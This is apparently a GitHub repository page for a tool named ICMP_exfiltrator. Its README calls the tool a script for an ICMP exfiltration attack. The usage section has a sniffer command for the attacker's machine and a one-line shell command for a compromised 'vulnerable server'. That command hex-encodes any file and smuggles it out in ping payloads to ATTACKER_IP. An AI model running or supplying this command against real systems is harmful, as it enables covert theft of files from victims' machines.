Skip to content

Invertebr4do/ICMP_exfiltrator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

ICMP_exfiltrator

Usage

  • Start the sniffer
sudo python3 ICMP_exfiltrator.py tun0
  • Execute in the vulnerable server
xxd -p -c 4 /file/to/read | while read line; do ping -c 1 -p $line ATTACKER_IP; done
  • And you will be able to read the file in the sniffer window

About

Script for icmp exfiltration attack

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages